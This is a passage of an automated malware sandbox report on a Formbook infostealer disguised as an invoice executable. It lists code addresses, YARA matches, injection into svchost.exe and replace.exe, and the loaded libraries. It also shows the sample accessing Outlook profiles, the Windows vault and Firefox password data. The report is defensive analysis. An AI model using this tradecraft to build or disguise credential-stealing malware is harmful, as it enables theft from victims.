            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_02B31D5A5_2_02B31D5A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_021319505_2_02131950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0212CAB05_2_0212CAB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0212AB305_2_0212AB30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0212C8905_2_0212C890
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_021332005_2_02133200
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_021350205_2_02135020
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0214B6405_2_0214B640
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0293E2385_2_0293E238
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0293E3535_2_0293E353
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0293E6EC5_2_0293E6EC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0293D7585_2_0293D758
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0293C9F85_2_0293C9F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02AC7E54 appears 111 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02A6B970 appears 280 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02AEEA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02AB5130 appears 58 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02AFF290 appears 105 times
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: String function: 00445AE0 appears 55 times
            Source: Revised Invoice H000127896.exe, 00000000.00000003.2068678336.000000000478D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Revised Invoice H000127896.exe
            Source: Revised Invoice H000127896.exe, 00000000.00000003.2069987307.0000000003E13000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Revised Invoice H000127896.exe
            Source: Revised Invoice H000127896.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@7/4
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeFile created: C:\Users\user\AppData\Local\Temp\niellistsJump to behavior
            Source: Revised Invoice H000127896.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: replace.exe, 00000005.00000002.3291550327.000000000260E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2707246168.00000000025E3000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2707349833.0000000002604000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002604000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.000000000262F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Revised Invoice H000127896.exeReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeFile read: C:\Users\user\Desktop\Revised Invoice H000127896.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Revised Invoice H000127896.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"Jump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Revised Invoice H000127896.exeStatic file information: File size 1379361 > 1048576
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2532507526.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490823870.000000000321A000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000002.3292070177.0000000000F38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MUjPkRkjOWKkX.exe, 00000004.00000000.2443952915.000000000080E000.00000002.00000001.01000000.00000005.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3291334317.000000000080E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Revised Invoice H000127896.exe, 00000000.00000003.2068504373.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Revised Invoice H000127896.exe, 00000000.00000003.2068190374.0000000004660000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2422918073.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420841777.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532582693.000000000399E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000002.3292894877.0000000002A40000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2532709579.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.3292894877.0000000002BDE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.2534511525.000000000288D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: replace.exe, 00000005.00000002.3293409108.000000000306C000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000000.2598292163.000000000305C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2821347362.0000000039BDC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: Revised Invoice H000127896.exeStatic PE information: real checksum: 0xa961f should be: 0x155d3a
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418066 push ecx; rep ret 2_2_0041808F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414012 push es; iretd 2_2_00414075
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A71 pushfd ; retf 2_2_00401ABE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032C0 push eax; ret 2_2_004032C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162CC pushad ; ret 2_2_004162CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B73 push ecx; ret 2_2_00417B74
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417C09 pushfd ; retf 2_2_00417C0C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404D68 push es; retf 2_2_00404D6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413DC3 push edx; retf 2_2_00413DFD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414632 push es; iretd 2_2_00414633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413E3A push edx; retf 2_2_00413DFD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415723 push edx; ret 2_2_004157E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413FC9 push es; iretd 2_2_00414075
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413FC9 push FFFFFFB3h; retn E51Dh2_2_004140F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404FCF push 001D5E1Fh; retf 2_2_00404FD4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401F9C push esp; ret 2_2_00401FAE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380225F pushad ; ret 2_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038027FA pushad ; ret 2_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380283D push eax; iretd 2_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03801368 push eax; iretd 2_2_03801369
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D4C340 push ecx; iretd 4_2_03D4C34E
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5CAE7 pushfd ; retf 4_2_03D5CAEA
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5CA51 push ecx; ret 4_2_03D5CA52
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5B1AA pushad ; ret 4_2_03D5B1AB
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5CF44 push ecx; rep ret 4_2_03D5CF6D
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D58F3F push es; iretd 4_2_03D58F53
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5A6C5 push ebx; iretd 4_2_03D5A6C9
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D49EAD push 001D5E1Fh; retf 4_2_03D49EB2
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeCode function: 4_2_03D5A601 push edx; ret 4_2_03D5A6C4
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeAPI/Special instruction interceptor: Address: 40A6EA4
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\replace.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
